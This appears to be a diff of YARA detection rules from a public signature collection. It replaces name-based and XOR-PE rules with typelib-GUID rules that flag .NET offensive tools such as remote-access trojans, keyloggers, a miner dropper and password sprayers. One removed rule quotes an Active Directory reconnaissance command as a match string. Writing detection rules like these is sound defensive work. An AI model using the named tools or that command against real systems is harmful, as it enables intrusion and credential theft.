+		$typelibguid9up = "EE510712-0413-49A1-B08B-1F0B0B33D6EF" ascii wide
+		$typelibguid10lo = "9780da65-7e25-412e-9aa1-f77d828819d6" ascii wide
+		$typelibguid10up = "9780DA65-7E25-412E-9AA1-F77D828819D6" ascii wide
+		$typelibguid11lo = "7913fe95-3ad5-41f5-bf7f-e28f080724fe" ascii wide
+		$typelibguid11up = "7913FE95-3AD5-41F5-BF7F-E28F080724FE" ascii wide
 
 	condition:
-		uint16( 0 ) != 0x5a4d and uint32( ( uint16( 0x3c ) ^ ( uint16( 0 ) ^ 0x5a4d ) ) | ( ( uint16( 0x3e ) ^ ( uint16( 0 ) ^ 0x5a4d ) ) << 16 ) ) ^ ( ( uint16( 0 ) ^ 0x5a4d ) | ( ( uint16( 0 ) ^ 0x5a4d ) << 16 ) ) == 0x00004550
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_Four_Byte_XOR_PE_And_MZ : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_The_Collection : FILE
 {
 	meta:
-		description = "Look for 4 byte xor of a PE starting at offset 0"
-		author = "Wesley Shields <wxs@atarininja.org>"
-		id = "d7b4b462-dfde-5d1f-8039-63522436c15f"
-		date = "2021-10-11"
-		modified = "2023-12-05"
-		reference = "https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xored_pe.yar#L15-L28"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4ae78576-ab75-5679-9a29-4d9a1ff03f15"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/Tlgyt/The-Collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2283-L2305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "28230cd3c1d1da97a98df09243593eb59b57f376f651d5f22c3ea5903f0f73e4"
-		score = 70
+		logic_hash = "a2cceb8173d9cf3a429a07f2abd2e09970a1807258a315991495a1904f0f4af0"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$typelibguid0lo = "579159ff-3a3d-46a7-b069-91204feb21cd" ascii wide
+		$typelibguid0up = "579159FF-3A3D-46A7-B069-91204FEB21CD" ascii wide
+		$typelibguid1lo = "5b7dd9be-c8c3-4c4f-a353-fefb89baa7b3" ascii wide
+		$typelibguid1up = "5B7DD9BE-C8C3-4C4F-A353-FEFB89BAA7B3" ascii wide
+		$typelibguid2lo = "43edcb1f-3098-4a23-a7f2-895d927bc661" ascii wide
+		$typelibguid2up = "43EDCB1F-3098-4A23-A7F2-895D927BC661" ascii wide
+		$typelibguid3lo = "5f19919d-cd51-4e77-973f-875678360a6f" ascii wide
+		$typelibguid3up = "5F19919D-CD51-4E77-973F-875678360A6F" ascii wide
+		$typelibguid4lo = "17fbc926-e17e-4034-ba1b-fb2eb57f5dd3" ascii wide
+		$typelibguid4up = "17FBC926-E17E-4034-BA1B-FB2EB57F5DD3" ascii wide
 
 	condition:
-		uint16( 0 ) != 0x5a4d and uint32( 0x28 ) != 0x00000000 and uint32( 0x28 ) == uint32( 0x2c ) and uint32( uint32( 0x3c ) ^ uint32( 0x28 ) ) ^ uint32( 0x28 ) == 0x00004550
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Fakefilemaker : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Change_Lockscreen : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "2c87114f-5295-583f-b567-623d478ce0eb"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/FakeFileMaker"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L3-L16"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a817c6e8-95f9-56c6-97b8-4be06658629f"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/nccgroup/Change-Lockscreen"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2307-L2321"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "27d402835f31b6383c837e90248ae5c6d22f4c267d52625ebfbcc2ee5099ccad"
+		logic_hash = "92ec9daecd17c8b0aa92f266b2cd81e0198a28d41e43d526bc94b9a2df23015b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "FakeFileMaker" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "78642ab3-eaa6-4e9c-a934-e7b0638bc1cc" ascii wide
+		$typelibguid0up = "78642AB3-EAA6-4E9C-A934-E7B0638BC1CC" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Wmipersistence : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_LOLBITS : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "7a674596-c697-569d-a16c-3cefe4ff752a"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/mdsecactivebreach/WMIPersistence"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L18-L31"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "66454ac0-742b-51a3-ac45-1ac9606e8b89"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/Kudaes/LOLBITS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2323-L2337"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f8f5e1b6d9b9e8e2f76a7e02385142bbeb755d1b1e41e501f4f74fcaba0a7dad"
+		logic_hash = "8c60938c037017f5b0ee355aec23fc8b7c629202457edaec01ab5a5ed94dc2f1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "WMIPersistence" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "29d09aa4-ea0c-47c2-973c-1d768087d527" ascii wide
+		$typelibguid0up = "29D09AA4-EA0C-47C2-973C-1D768087D527" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_Adcollector_Sep22_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Keylogger : FILE
 {
 	meta:
-		description = "Detects ADCollector Tool - a lightweight tool to quickly extract valuable information from the Active Directory environment for both attacking and defending"
-		author = "Florian Roth (Nextron Systems)"
-		id = "48b376e4-752b-523e-b34e-65b6944c33fb"
-		date = "2022-09-15"
-		modified = "2024-12-10"
-		reference = "https://github.com/dev-2null/ADCollector"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L55-L75"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0576756e-26d5-5165-b621-917126a75a38"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/BlackVikingPro/Keylogger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2339-L2353"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "66d5363e885378c442e7532f69d4c36618d7a0f5dbe67490631d1ed5078d3fba"
+		logic_hash = "37cd0615243abc0a2d29220285aabcaa75824ab1bc9b8ab395d90c1851a0159a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338"
-		hash2 = "cc086eb7316e68661e3d547b414890d5029c5cc460134d8b628f4b0be7f27fb3"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "ADCollector.exe --SPNs --Term key --Acls 'CN=Domain Admins,CN=Users,DC=lab,DC=local'" wide fullword
-		$s1 = "ADCollector.exe" wide fullword
-		$s2 = "ENCRYPTED_TEXT_PASSWORD_ALLOWED" ascii fullword
-		$s3 = "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf" wide
-		$s4 = "[-] Password Does Not Expire Accounts:" wide
-		$s5 = "  * runAs:       {0}" wide fullword
+		$typelibguid0lo = "7afbc9bf-32d9-460f-8a30-35e30aa15879" ascii wide
+		$typelibguid0up = "7AFBC9BF-32D9-460F-8A30-35E30AA15879" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Maliciousclickoncegenerator : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_1337 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "683af3b4-4c91-5ff3-96bf-d5c1d9c19cc2"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Mr-Un1k0d3r/MaliciousClickOnceGenerator"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L77-L90"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4b79867d-761c-5aa8-bf8a-60caa50d8aa6"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/neofito/CVE-2020-1337"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2355-L2369"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "91e5878d49ad9af5420d4e29afaa600337fb8051951598a997cd74d72c884206"
+		logic_hash = "f9a7d47861d19bb312cd75cd2edf66c8df02a0685a3eb5a1dd413e7b1c3c8234"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "MaliciousClickOnceGenerator" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "d9c2e3c1-e9cc-42b0-a67c-b6e1a4f962cc" ascii wide
+		$typelibguid0up = "D9C2E3C1-E9CC-42B0-A67C-B6E1A4F962CC" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Directinjectorpoc : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharplogger : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "d9a430d7-b062-554b-aff4-cfd98d91e9fe"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/badBounty/directInjectorPOC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L92-L105"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5cce395b-4f6f-5015-b45e-7eb79853296a"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/djhohnstein/SharpLogger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2371-L2385"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ffdc5694668af6c82b493403373d2e2e915e45bca8d58ec1ab41c5a8bd28d781"
+		logic_hash = "a5118f0df57a4d9b0a7d682a016866ef5ae20c52e078223d72fc060774e17f48"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "directInjectorPOC" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "36e00152-e073-4da8-aa0c-375b6dd680c4" ascii wide
+		$typelibguid0up = "36E00152-E073-4DA8-AA0C-375B6DD680C4" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Asstrongasfuck : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Asyncrat_C_Sharp : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "4c63c8a2-5889-5177-9f66-8e5f755025a3"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Charterino/AsStrongAsFuck"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L107-L120"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "858a079d-71e8-516e-a2a9-f0969edc758b"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2387-L2421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4765f2099bf8fa8ebccd8cdcc561354f4aeba28c2473fd8556f1ef1d5d28dadd"
+		logic_hash = "efb1c38e502483c25f8b81d6485f11130ed91a31a4dc64486db5c8bf2e8b1a53"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "AsStrongAsFuck" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "619b7612-dfea-442a-a927-d997f99c497b" ascii wide
+		$typelibguid0up = "619B7612-DFEA-442A-A927-D997F99C497B" ascii wide
+		$typelibguid1lo = "424b81be-2fac-419f-b4bc-00ccbe38491f" ascii wide
+		$typelibguid1up = "424B81BE-2FAC-419F-B4BC-00CCBE38491F" ascii wide
+		$typelibguid2lo = "37e20baf-3577-4cd9-bb39-18675854e255" ascii wide
+		$typelibguid2up = "37E20BAF-3577-4CD9-BB39-18675854E255" ascii wide
+		$typelibguid3lo = "dafe686a-461b-402b-bbd7-2a2f4c87c773" ascii wide
+		$typelibguid3up = "DAFE686A-461B-402B-BBD7-2A2F4C87C773" ascii wide
+		$typelibguid4lo = "ee03faa9-c9e8-4766-bd4e-5cd54c7f13d3" ascii wide
+		$typelibguid4up = "EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3" ascii wide
+		$typelibguid5lo = "8bfc8ed2-71cc-49dc-9020-2c8199bc27b6" ascii wide
+		$typelibguid5up = "8BFC8ED2-71CC-49DC-9020-2C8199BC27B6" ascii wide
+		$typelibguid6lo = "d640c36b-2c66-449b-a145-eb98322a67c8" ascii wide
+		$typelibguid6up = "D640C36B-2C66-449B-A145-EB98322A67C8" ascii wide
+		$typelibguid7lo = "8de42da3-be99-4e7e-a3d2-3f65e7c1abce" ascii wide
+		$typelibguid7up = "8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE" ascii wide
+		$typelibguid8lo = "bee88186-769a-452c-9dd9-d0e0815d92bf" ascii wide
+		$typelibguid8up = "BEE88186-769A-452C-9DD9-D0E0815D92BF" ascii wide
+		$typelibguid9lo = "9042b543-13d1-42b3-a5b6-5cc9ad55e150" ascii wide
+		$typelibguid9up = "9042B543-13D1-42B3-A5B6-5CC9AD55E150" ascii wide
+		$typelibguid10lo = "6aa4e392-aaaf-4408-b550-85863dd4baaf" ascii wide
+		$typelibguid10up = "6AA4E392-AAAF-4408-B550-85863DD4BAAF" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Magentoscanner : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Darkfender : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "db3912bd-574c-57e2-a9b6-4b440d144471"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/soufianetahiri/MagentoScanner"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L122-L135"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0aea5e05-7788-5581-8bcc-d2e75a291dd9"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/0xyg3n/DarkFender"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2423-L2437"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "245dce3be07c8e84dfcd2cdb2d9f24406a9b11b437e74969f1472a6ee149fd9c"
+		logic_hash = "97cc537dca2f8559edf7ca44124a2056194aceee9327fa097674bccdeb0316df"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "MagentoScanner" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "12fdf7ce-4a7c-41b6-9b32-766ddd299beb" ascii wide
+		$typelibguid0up = "12FDF7CE-4A7C-41B6-9B32-766DDD299BEB" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Revengerat_Stub_Cssharp : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Minerdropper : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "06dce4f9-4d7a-5976-a87a-07c539e5dbe8"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/NYAN-x-CAT/RevengeRAT-Stub-CSsharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L137-L150"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "607f72df-b0c1-53df-bf2c-592f55cbfcb7"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/DylanAlloy/MinerDropper"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2459-L2475"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a3bd1f8e52e6ed468b6a4fea83456ca813b69e2d676dfab687bbea5a746fed3c"
+		logic_hash = "ce050b7dd0a9bae5737f5170a8656f737754e6c96e64bca2ceab9b030c4cdddb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "RevengeRAT-Stub-CSsharp" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "46a7af83-1da7-40b2-9d86-6fd6223f6791" ascii wide
+		$typelibguid0up = "46A7AF83-1DA7-40B2-9D86-6FD6223F6791" ascii wide
+		$typelibguid1lo = "8433a693-f39d-451b-955b-31c3e7fa6825" ascii wide
+		$typelibguid1up = "8433A693-F39D-451B-955B-31C3E7FA6825" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpyshell : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdomainspray : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "3069c5eb-446e-5bfa-9df0-2e03f229d4d1"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/antonioCoco/SharPyShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L152-L165"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cffd3350-4a86-5035-ab15-adbc3ac2a0e9"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/HunnicCyber/SharpDomainSpray"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2477-L2491"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "89d0010c08349f8982c7f5aa5f7855702556ce10f9f3b5b18b61349c5233e001"
+		logic_hash = "cb8bbeebe23a1e9e77fae170f2742aa0aabfb88436f91dc78f94cc1bef70b2dd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "SharPyShell" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "76ffa92b-429b-4865-970d-4e7678ac34ea" ascii wide
+		$typelibguid0up = "76FFA92B-429B-4865-970D-4E7678AC34EA" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Ghostloader : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ispykeylogger : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "d8d88f3f-f250-55ff-88a6-4623e12ef89d"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/TheWover/GhostLoader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L167-L180"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8607de67-b472-5afc-b2b9-cc758b5ec474"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/mwsrc/iSpyKeylogger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2493-L2513"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "91527b4b35f2bb1aeee236647c5169c67f2b9cfb867f2b6d486bd8d8b7455d4b"
+		logic_hash = "a323adff7a71022a88c0ea1d2d7ddba14f3cefab50c431c2972165ae412f2565"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "GhostLoader" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "ccc0a386-c4ce-42ef-aaea-b2af7eff4ad8" ascii wide
+		$typelibguid0up = "CCC0A386-C4CE-42EF-AAEA-B2AF7EFF4AD8" ascii wide
+		$typelibguid1lo = "816b8b90-2975-46d3-aac9-3c45b26437fa" ascii wide
+		$typelibguid1up = "816B8B90-2975-46D3-AAC9-3C45B26437FA" ascii wide
+		$typelibguid2lo = "279b5533-d3ac-438f-ba89-3fe9de2da263" ascii wide
+		$typelibguid2up = "279B5533-D3AC-438F-BA89-3FE9DE2DA263" ascii wide
+		$typelibguid3lo = "88d3dc02-2853-4bf0-b6dc-ad31f5135d26" ascii wide
+		$typelibguid3up = "88D3DC02-2853-4BF0-B6DC-AD31F5135D26" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Dotnetinject : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Solarflare : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "468f89c4-5b94-53be-b9e6-ad21de7d98ba"
-		date = "2021-01-22"
-		modified = "2022-06-28"
-		reference = "https://github.com/dtrizna/DotNetInject"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L182-L202"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3645e14c-6025-59fa-a5a2-d8dacba8cd94"
+		date = "2020-12-15"
+		modified = "2023-04-06"
+		reference = "https://github.com/mubix/solarflare"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2515-L2529"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "07ba4ba23372dbc2618dcea89ef643cd68371ace1116bfeb939b0f9adfc425bb"
+		logic_hash = "4e35c57795ce3adaab52cba23a6d845617fed6c94dd1df048dcaa115086c513c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "DotNetInject" ascii wide
-		$compile = "AssemblyTitle" ascii wide
-		$fp1 = "GetDotNetInjector" ascii
-		$fp2 = "JetBrains.TeamCity.Injector." wide
+		$typelibguid0lo = "ca60e49e-eee9-409b-8d1a-d19f1d27b7e4" ascii wide
+		$typelibguid0up = "CA60E49E-EEE9-409B-8D1A-D19F1D27B7E4" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 20MB and $name and $compile and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Atpminidump : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Snaffler : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
